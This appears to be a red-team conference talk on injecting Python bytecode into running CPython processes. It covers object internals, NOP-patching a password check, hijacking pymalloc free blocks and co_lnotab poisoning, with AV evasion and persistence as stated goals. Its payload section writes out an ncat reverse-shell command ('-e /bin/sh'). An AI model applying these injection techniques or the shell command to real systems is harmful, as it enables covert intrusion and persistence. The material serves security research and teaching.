Evolving the Process Injection: Injecting the Python bytecode
WhoAmI
- Red teamer at Sberbank of Russia
- OSCP/OSCE/SLAE
Process Injection purposes
- Accessing/modifying in-memory data or program execution flow
- AV evasion & anti-forensics
- Post-exploitation & maintaining access
Traditional Process Injection
- Linux
  ○ strace
  ○ ptrace
  ○ SO Injection
- Windows
  ○ DLL Injection
  ○ Process Hollowing
Software is Evolving
- Interpreted (and VM-based) languages keep growing in popularity, even in non-traditional areas
- New paradigms: microservices, serverless technologies
Evolving & Attacker Benefits
- Injecting VM-based (or other interpreted) languages potentially gives our payloads all the benefits of these languages: portability, the ability to use high-level interfaces instead of low-level functions, and so on
- Also, it is very hard to investigate — how many people can detect and
successfully reverse engineer Java or Python bytecode payloads?
Primary Goal
- Find a way to manipulate a running Python process to achieve the required impact on the target system (user-mode persistence, internal logic modification, and so on)
- The approach should work at least on x86_64, Linux, and CPython 3.5.3
Python
- Interpreted, high-level programming language
- Object-oriented, mostly
- Strong community, great standard library, and perfect extensibility
Note: Python itself is just a language reference. You can build your own Python engine and decide how it handles Python code: compile it to a special bytecode, interpret it as is, or even translate it to Java bytecode and execute it on the JVM
CPython
- The reference implementation of Python
- Written in C (and Python)
- Compiles source code to bytecode and interprets it with Python Virtual
Machine (PVM)
CPython — Compilation
1. Parse source code into a parse tree
2. Transform parse tree into an Abstract Syntax Tree
3. Transform AST into a Control Flow Graph
4. Emit bytecode based on the Control Flow Graph
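The pipeline above can be observed partially from Python itself. The following is a minimal sketch, assuming a stock CPython interpreter: ast.parse covers the parsing steps and compile emits the bytecode. The Control Flow Graph is internal to the compiler and is not exposed here. The filename "<example>" is an arbitrary label chosen for illustration.

```python
import ast

# Source text for a tiny module (illustrative only).
source = 'print("Hello!")'

# Steps 1-2: source text -> Abstract Syntax Tree.
tree = ast.parse(source, filename="<example>")

# Steps 3-4: AST -> code object holding the bytecode.
code = compile(tree, filename="<example>", mode="exec")

tree_type = type(tree).__name__   # name of the AST root node class
code_type = type(code).__name__   # name of the code object class
bytecode_hex = code.co_code.hex() # raw bytecode; exact bytes vary by version

print(tree_type, code_type, bytecode_hex)
```

The exact bytecode bytes differ between CPython versions, so no expected output is given for them.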
CPython — Compilation Example
>>> import dis
>>> def hello():
...     print("Hello!")
...
>>> hello
<function hello at 0x10bd210d0>
>>> hello()
Hello!
>>> hello.__code__.co_code.hex()
'740064018301010064005300'
>>> dis.dis(hello.__code__)
  2           0 LOAD_GLOBAL              0 (print)
              2 LOAD_CONST               1 ('Hello!')
              4 CALL_FUNCTION            1
              6 POP_TOP
              8 LOAD_CONST               0 (None)
             10 RETURN_VALUE
Compilation produces a set of Objects (e.g., CodeObject for handling bytecode) and prepares them for Interpretation in the PVM
CPython — Python Virtual Machine (PVM)
- Virtual Stack Machine
  ○ Value Stack, Call Stack, and Block Stack
  ○ No registers ⇨ Short instruction list
- Custom memory management
  ○ Huge space mapped as MAP_ANONYMOUS | MAP_PRIVATE
  ○ Arenas, Pools, and Blocks: internal memory management primitives ⇨ Small number of system malloc/free calls
- Operates on Objects, not raw memory values
  ⇨ Keeps abstraction level high
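To make the Value Stack idea concrete, here is a toy interpreter for the six instructions that appear in the hello() disassembly. It is only a sketch: the function run and the tuple-based instruction encoding are invented for illustration and do not mirror the real evaluation loop, which also maintains the Call Stack and Block Stack.

```python
def run(instructions, consts, names, global_ns):
    """Interpret a tiny instruction list using a single value stack."""
    stack = []
    for opname, arg in instructions:
        if opname == "LOAD_GLOBAL":
            stack.append(global_ns[names[arg]])
        elif opname == "LOAD_CONST":
            stack.append(consts[arg])
        elif opname == "CALL_FUNCTION":
            # Pop `arg` positional arguments, then the callable below them.
            args = [stack.pop() for _ in range(arg)][::-1]
            func = stack.pop()
            stack.append(func(*args))
        elif opname == "POP_TOP":
            stack.pop()
        elif opname == "RETURN_VALUE":
            return stack.pop()
        else:
            raise ValueError(f"unsupported instruction: {opname}")
    raise RuntimeError("program ended without RETURN_VALUE")

# The hello() body, written as (name, argument) pairs.
program = [
    ("LOAD_GLOBAL", 0),
    ("LOAD_CONST", 1),
    ("CALL_FUNCTION", 1),
    ("POP_TOP", None),
    ("LOAD_CONST", 0),
    ("RETURN_VALUE", None),
]

printed = []  # stands in for stdout so the effect can be inspected
result = run(program, consts=(None, "Hello!"), names=("print",),
             global_ns={"print": printed.append})
```

Every instruction only pushes or pops Objects, which is why the instruction set can stay small.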
CPython — A Short Guide to Objects
- Compilation and Interpretation produce a wide set of memory primitives named Objects
- C is not object-oriented, so all Objects are described with corresponding structs
- The PVM works with these structs, so we have to examine some of them to move forward
CPython — PyObject & PyVarObject
- Universal headers, the Basis for all other Objects
- Every pointer to a CPython Object can be cast to a PyObject* — inheritance
built by hand
- PyVarObject is just a PyObject extension to describe Objects with a variable-sized part
PyObject — Structure
typedef struct _object {
    _PyObject_HEAD_EXTRA
    Py_ssize_t ob_refcnt;
    struct _typeobject *ob_type;
} PyObject;
PyVarObject — Structure
typedef struct {
    PyObject ob_base;
    Py_ssize_t ob_size;
} PyVarObject;
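These headers can be inspected from inside a running interpreter with ctypes. The sketch below rests on several assumptions: CPython (where id() returns the object's address), ob_type being the last field of PyObject, and object.__basicsize__ equalling sizeof(PyObject) on the current build. The helper names read_ob_type and read_ob_size are invented for illustration.

```python
import ctypes

POINTER_SIZE = ctypes.sizeof(ctypes.c_void_p)
# Assumption: object.__basicsize__ is sizeof(PyObject) on this build.
HEADER_SIZE = object.__basicsize__

def read_ob_type(obj):
    """Read the ob_type pointer, assumed to be the last PyObject field."""
    address = id(obj) + HEADER_SIZE - POINTER_SIZE
    return ctypes.c_void_p.from_address(address).value

def read_ob_size(obj):
    """Read ob_size, which follows the PyObject header in a PyVarObject."""
    return ctypes.c_ssize_t.from_address(id(obj) + HEADER_SIZE).value

sample_tuple = (1, 2, 3)
sample_bytes = b"abcd"

tuple_type_address = read_ob_type(sample_tuple)  # should equal id(tuple)
tuple_length = read_ob_size(sample_tuple)
bytes_length = read_ob_size(sample_bytes)
```

Only call read_ob_size on Objects that really are PyVarObjects (tuples and bytes here); for other Objects the bytes at that offset mean something else.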
CPython — Types
- Every Object in CPython has its own Type, specified by the PyObject.ob_type field
- Types are Objects too: instances of the PyTypeObject struct
- Type Objects are a fundamental part of CPython describing Objects
functionality and behavior
- Some Examples:
  ○ PyUnicodeObject.ob_type → PyUnicode_Type
  ○ PyBytesObject.ob_type → PyBytes_Type
  ○ PyCodeObject.ob_type → PyCode_Type
CPython — The Type for Types
- Every Type Object is a PyObject, therefore it has the ob_type field:
  ○ PyUnicode_Type.ob_type → PyType_Type
  ○ PyBytes_Type.ob_type → PyType_Type
  ○ PyCode_Type.ob_type → PyType_Type
- But PyType_Type is a PyObject too:
○ PyType_Type.ob_type → PyType_Type
PyTypeObject — Structure
typedef struct _typeobject {
    PyObject_VAR_HEAD
    const char *tp_name;
    Py_ssize_t tp_basicsize, tp_itemsize;
    ...
} PyTypeObject;
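The same relationships are visible at the Python level, where type(x) reflects ob_type and the attributes __name__, __basicsize__, and __itemsize__ reflect tp_name, tp_basicsize, and tp_itemsize. A short sketch, assuming a stock CPython build:

```python
import ctypes

# The code type has no builtin name, so take it from a compiled object.
code_type = type(compile("", "<example>", "exec"))
type_objects = (str, bytes, tuple, code_type)

# Each Type Object's own type is `type` (PyType_Type) ...
all_are_types = all(type(t) is type for t in type_objects)
# ... and PyType_Type points back at itself.
type_of_type_is_type = type(type) is type

# tp_name -> (tp_basicsize, tp_itemsize); concrete sizes depend on the build.
layout = {t.__name__: (t.__basicsize__, t.__itemsize__) for t in type_objects}

for name, (basicsize, itemsize) in layout.items():
    print(f"{name}: basicsize={basicsize} itemsize={itemsize}")
```

The item size shows what the variable-sized part holds: one byte per element for bytes, one pointer per element for tuple.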
A Short Guide to Objects — Subtotals
- We already know the structure of PyObject and PyTypeObject instances, which are comparatively low-level structures.
- There is still no place to inject CPython bytecode.
- Let’s check the Object that works with CPython bytecode itself —
PyCodeObject.
CPython — PyCodeObject
- PyCodeObject — PyObject extension to describe pieces of Static Code.
- PyCodeObject.ob_type → PyCode_Type
- PyCodeObject is NOT a run-time primitive, it stores only static information
about bytecode:
  ○ PyUnicodeObject* co_name: specifies code name (e.g., function name, <stdin>)
  ○ PyBytesObject* co_code: opcode sequence
  ○ PyTupleObject* co_consts: constants used
PyCodeObject — Example
>>> def hello():
...     print("Hello!")
...
>>> hello.__code__.co_name
'hello'
>>> hello.__code__.co_code
b't\x00d\x01\x83\x01\x01\x00d\x00S\x00'
>>> hello.__code__.co_consts
(None, 'Hello!')
PyCodeObject — Structure
typedef struct {
    PyObject_HEAD
    ...
    PyObject *co_code;
    PyObject *co_filename;
    PyObject *co_name;
    ...
} PyCodeObject;
PyCodeObject — Points of Interest
- Controlling PyCodeObject allows us to play with member fields and pointers
like co_code and co_consts
- Changing the co_code (ob_type → PyBytes_Type) field gives us the ability to change existing bytecode or inject new bytecode
- Playing with the co_consts (ob_type → PyTuple_Type) field allows us to add
some data to our injection
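The effect of swapping co_consts can be tried safely inside one's own interpreter with the documented code.replace() method (Python 3.8 and later). This is not the memory-level technique described in the talk, only an in-process illustration of why controlling these fields matters; the function hello and the replacement string are illustrative.

```python
def hello():
    return "Hello!"

original_code = hello.__code__

# Build a new constants tuple with one value swapped.
new_consts = tuple(
    "Patched!" if const == "Hello!" else const
    for const in original_code.co_consts
)

# Code objects are immutable, so replace() returns a modified copy.
hello.__code__ = original_code.replace(co_consts=new_consts)

result = hello()
```

The bytecode itself is unchanged: it still loads the constant at the same index, but that index now refers to different data.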
CPython — PyBytesObject
- PyBytesObject — PyVarObject extension to describe byte sequences
- PyBytesObject.ob_type → PyBytes_Type
- Just a container for a byte sequence
PyBytesObject — Structure
typedef struct {
    PyObject_VAR_HEAD
    Py_hash_t ob_shash;
    char ob_sval[1];
} PyBytesObject;
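The layout above can be checked from within the interpreter by reading ob_size and ob_sval of a bytes object directly. This sketch assumes CPython, where id() is the object's address, and relies on bytes.__basicsize__ being offsetof(PyBytesObject, ob_sval) + 1, as defined in CPython's bytesobject.c. The sample value is illustrative.

```python
import ctypes

data = b"\x74\x00\x64\x01"  # arbitrary sample bytes

# Assumption: ob_size follows the PyObject header.
ob_size_offset = object.__basicsize__
# Assumption: tp_basicsize of bytes is offsetof(ob_sval) + 1.
ob_sval_offset = bytes.__basicsize__ - 1

# Read the length field, then the raw payload that follows the header.
size = ctypes.c_ssize_t.from_address(id(data) + ob_size_offset).value
raw = ctypes.string_at(id(data) + ob_sval_offset, size)

print(size, raw.hex())
```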
CPython — PyTupleObject
- PyTupleObject: PyVarObject extension to describe immutable arrays of object references
- PyTupleObject.ob_type → PyTuple_Type
- Just a container for object references
PyTupleObject — Structure
typedef struct {
    PyObject_VAR_HEAD
    PyObject *ob_item[1];
} PyTupleObject;
A Short Guide to Objects — Conclusion
- Gaining control over a PyCodeObject and the corresponding low-level structures allows us to patch bytecode, inject values, and do other things in the process's virtual memory
- The main question here: how can we find the necessary PyCodeObject?
Finding PyCodeObject
The main approach: unraveling pointer chains
- with a known code name: targeted impact
  ○ Code name ⇨ PyUnicodeObject ⇨ PyCodeObject.co_name
- with a Symbol Table lookup: requires access to the Python binary
  ○ PyCode_Type (from Symbol Table) ⇨ PyCodeObject.ob_type
- with PyType_Type: potentially gives us access to all Objects
  ○ "type\x00" ⇨ PyType_Type ⇨ PyCode_Type ⇨ PyCodeObject.ob_type
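As an in-process analogue of the "known code name" route, the garbage collector's object list can be searched for functions whose code object carries a given co_name. This is only an illustration of the name-to-code-object lookup, not the pointer-chain scan over raw memory described above. It assumes function objects are tracked by the GC, and the helper find_code_objects is invented for this sketch.

```python
import gc
import types

def check_password(password):
    return password == "P@ssw0rd"

def find_code_objects(name):
    """Return code objects of GC-tracked functions with the given co_name."""
    return [
        obj.__code__
        for obj in gc.get_objects()
        # Exact type check avoids touching attributes of unrelated objects.
        if type(obj) is types.FunctionType and obj.__code__.co_name == name
    ]

matches = find_code_objects("check_password")
found = any(code is check_password.__code__ for code in matches)
```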
PyCodeObject.co_code Patching
- Once the PyCodeObject is located, we can continue our work
- Let's try to patch existing bytecode and see how we can use that
PyCodeObject.co_code Patching — Example
- An old-school example: patching the "if-then-else" construction
def check_password(password):
    if password == "P@ssw0rd":
        return True
    else:
        return False
# bytecode: 7c00006401006b0200721000640200536403005364000053
PyCodeObject.co_code Patching — Example
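- We will use the NOP instruction (opcode 0x09) to overwrite the conditional jump, which occupies bytes 9 to 11 (opcode 0x72, POP_JUMP_IF_FALSE)
# bytecode[9:12] = b"\x09\x09\x09"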
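The patch can be reproduced on the bytecode string alone, without touching any process. The sketch below works on the hex dump from the slide, which uses the CPython 3.5 encoding (one opcode byte plus a two-byte argument); the opcode values are those of that version.

```python
# Bytecode of check_password as shown on the slide (CPython 3.5 format).
original = bytes.fromhex("7c00006401006b0200721000640200536403005364000053")

NOP = 0x09
POP_JUMP_IF_FALSE = 0x72

patched = bytearray(original)

# Bytes 9..11 hold POP_JUMP_IF_FALSE and its two-byte jump target.
jump_opcode = patched[9]

# Overwrite the jump with three NOPs so execution always falls through
# to the "return True" branch.
patched[9:12] = bytes([NOP]) * 3

patched_hex = patched.hex()
print(patched_hex)
```

The length of the bytecode does not change, so all other offsets stay valid.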
PyCodeObject.co_code Patching — The Problem
- Patching bytecode while it is being executed can crash the application
- PyCodeObject is not a run-time primitive, so it has no flag that tells us whether the Object is executing
- But such a flag exists in PyFrameObject
CPython — PyFrameObject
- PyFrameObject — PyVarObject extension to describe the Call Stack Frame
- PyFrameObject.ob_type → PyFrame_Type
- PyFrameObject is a dynamic object created during Interpretation; it stores arguments during a function call and does the other things a traditional Stack Frame does
PyFrameObject — Structure
typedef struct _frame {
    PyObject_VAR_HEAD
    struct _frame *f_back;      /* previous frame, or NULL */
    PyCodeObject *f_code;       /* code segment */
    ...
    PyObject *f_locals;         /* local symbol table (any mapping) */
    ...
    PyObject *f_localsplus[1];  /* locals+stack, dynamically sized */
} PyFrameObject;
The Problem — Solution
- Enumerate all PyFrameObjects whose f_code field points to the PyCodeObject we are going to patch, and check the PyFrameObject.f_executing flag
- If no PyFrameObjects are executing, patch the bytecode
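A comparable check can be sketched from inside the interpreter by walking every thread's frame chain through f_back and comparing f_code. This is an approximation, not the f_executing test itself: it reports code that is anywhere on a call stack and does not see suspended generator frames. The helper is_on_call_stack is invented for this sketch.

```python
import sys

def is_on_call_stack(code):
    """Return True if any thread has a frame running the given code object."""
    for frame in sys._current_frames().values():
        # Walk from the topmost frame back to the bottom of the stack.
        while frame is not None:
            if frame.f_code is code:
                return True
            frame = frame.f_back
    return False

def target():
    # While target() runs, its own frame is on the current call stack.
    return is_on_call_stack(target.__code__)

def idle():
    return None

running_result = target()
idle_result = is_on_call_stack(idle.__code__)
```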
Demo #1
From Patching to Injection
- The simplest way to extend patching to injection will not work: if we try to append opcodes to the existing bytecode, we will crash the application
- Moreover, we still don't know how to add data to our payload
- The key to Injection is the ability to construct the necessary objects and embed them into the CPython memory structure and program flow
CPython — Memory Blocks
- The “bytes” object is Immutable
CPython — Memory Model
- Custom memory manager built on top of the system allocator: PyMalloc
- PyMalloc operates on a set of primitives: Blocks, Pools, and Arenas
- Reference-counting Garbage Collector (PyObject.ob_refcnt)
Controlling the Pool
- The Pool concept is the most interesting for us.
- Each Pool has a Pool Header that stores some juicy info, such as the list of free blocks released by the Garbage Collector
- The Pool Header address is a multiple of 4096, so it is easy to obtain the Pool Header address from the known address of an Object (and its corresponding Block) that lies inside this Pool
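Because Pools are aligned to their size, the Pool Header address is obtained by clearing the low bits of any address inside the Pool. A minimal sketch, assuming the 4096-byte Pool size stated above (other CPython versions may use a different size); the sample address is hypothetical.

```python
POOL_SIZE = 4096  # pool size and alignment assumed from the text above

def pool_header_address(object_address, pool_size=POOL_SIZE):
    """Round an address down to the start of its pool."""
    return object_address & ~(pool_size - 1)

# Hypothetical object address, chosen only for illustration.
example_object_address = 0x7F3A12345678
example_pool = pool_header_address(example_object_address)

print(hex(example_pool))  # 0x7f3a12345000
```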
pool_header — Structure
struct pool_header {
    union { block *_padding;
            uint count; } ref;          /* number of allocated blocks */
    block *freeblock;                   /* pool's free list head */
    struct pool_header *nextpool;       /* next pool of this size class */
    struct pool_header *prevpool;       /* previous pool "" */
    ...
    uint nextoffset;                    /* bytes to virgin block */
    uint maxnextoffset;                 /* largest valid nextoffset */
};
Injection — Memory Allocation Strategy
- We know the PyCodeObject address, so we can obtain the address of the current Pool Header
- If there are blocks in the free blocks list, shorten the list and take some blocks for the injected data (it is better to take Blocks from the middle of the list)
- If not, check the previous or next Pool Header
Injection — Payload
- Now we can create our own Objects and embed them into the CPython memory layout
- Let’s develop a simple nc-based reverse shell payload and inject it into
existing code
Payload — Balancing Code and Data
def shell_1():
    import os
    os.system('ncat 127.0.0.1 8081 -e /bin/sh &')

  0 LOAD_CONST      1 (0)
  2 LOAD_CONST      0 (None)
  4 IMPORT_NAME     0 (os)
  6 STORE_FAST      0 (os)
  8 LOAD_FAST       0 (os)
 10 LOAD_METHOD     1 (system)
 12 LOAD_CONST      2 ('ncat 127.0.0.1 8081 ...')
 14 CALL_METHOD     1
 16 POP_TOP
 18 LOAD_CONST      0 (None)
 20 RETURN_VALUE

def shell_2():
    eval("__import__('os').system('ncat 127.0.0.1 8081 -e /bin/sh &')")

  0 LOAD_GLOBAL     0 (eval)
  2 LOAD_CONST      1 ("__import__('os') ...")
  4 CALL_FUNCTION   1
  6 POP_TOP
  8 LOAD_CONST      0 (None)
 10 RETURN_VALUE
Payload — Explanation
  0 LOAD_GLOBAL     0 (eval)
Pushes the 0th element of co_names onto the Stack
>>> shell_2.__code__.co_names
('eval',)

  2 LOAD_CONST      1 ("__import__('os') ...")
Pushes the 1st element of co_consts onto the Stack
>>> shell_2.__code__.co_consts
(None, "__import__('os').system('ncat 127.0.0.1 8081 -e /bin/sh &')")

  4 CALL_FUNCTION   1
  6 POP_TOP
Calls the eval function and pops the result (really, who cares about the result?)

  8 LOAD_CONST      0 (None)
 10 RETURN_VALUE
Loads the 0th element of co_consts (None) and returns it as the result of our function; this is the least necessary part of our payload
Injection — Battle Plan
- Create the raw values for the following Objects
  ○ PyUnicodeObjects: for the "eval" and "__import__('os').system('...')" strings
  ○ PyTupleObjects: for the new PyCodeObject.co_names & co_consts tuples
  ○ PyBytesObject: for the patched PyCodeObject.co_code bytecode containing the injection itself
- Find suitable free blocks and inject these raw values into these blocks
- Provide the PyCodeObject with the new addresses of co_names, co_consts, and co_code
- The plan is good, but it will crash the application unless we take care of one more detail
PyCodeObject.co_lnotab
- Stores the mapping from bytecode offsets to line numbers
- A sequence of byte pairs: (bytecode offset increment, source line number increment)
def hello():
    print("hello!")
    print("world!")
    return True

>>> dis.dis(hello)
  2           0 LOAD_GLOBAL              0 (print)
              2 LOAD_CONST               1 ('hello!')
              4 CALL_FUNCTION            1
              6 POP_TOP

  3           8 LOAD_GLOBAL              0 (print)
             10 LOAD_CONST               2 ('world!')
             12 CALL_FUNCTION            1
             14 POP_TOP

  4          16 LOAD_CONST               3 (True)
             18 RETURN_VALUE
>>> hello.__code__.co_lnotab
b'\x00\x01\x08\x01\x08\x01'
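The table above can be decoded by hand. The sketch below works on the raw bytes from the example rather than reading co_lnotab from a live code object, since newer CPython versions deprecate that attribute. It assumes the function starts on line 1 and treats line increments as signed bytes, which to my knowledge is the convention since CPython 3.6; the helper decode_lnotab is invented for illustration.

```python
def decode_lnotab(lnotab, first_line):
    """Expand (offset increment, line increment) pairs into absolute values."""
    offset, line = 0, first_line
    table = []
    for i in range(0, len(lnotab), 2):
        offset += lnotab[i]
        line_increment = lnotab[i + 1]
        # Assumption: line increments are signed bytes (CPython 3.6+).
        if line_increment >= 0x80:
            line_increment -= 0x100
        line += line_increment
        table.append((offset, line))
    return table

# Raw co_lnotab from the example; "def hello():" is assumed to be line 1.
entries = decode_lnotab(b"\x00\x01\x08\x01\x08\x01", first_line=1)

print(entries)  # [(0, 2), (8, 3), (16, 4)]
```

The result matches the disassembly: line 2 starts at offset 0, line 3 at offset 8, and line 4 at offset 16.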
PyCodeObject.co_lnotab Poisoning
- Poisoning co_lnotab with the value "\x00\x01" allows us to inject any payload
- We just need to create a PyBytesObject with this value and change the PyCodeObject.co_lnotab pointer
- After that, we are ready to inject our payload
Demo #2
Conclusion
- Controlling PyCodeObject is the first step of the bytecode Patching or
Injection
- Common memory patching techniques (e.g., patching "if-then-else" statements) work well for CPython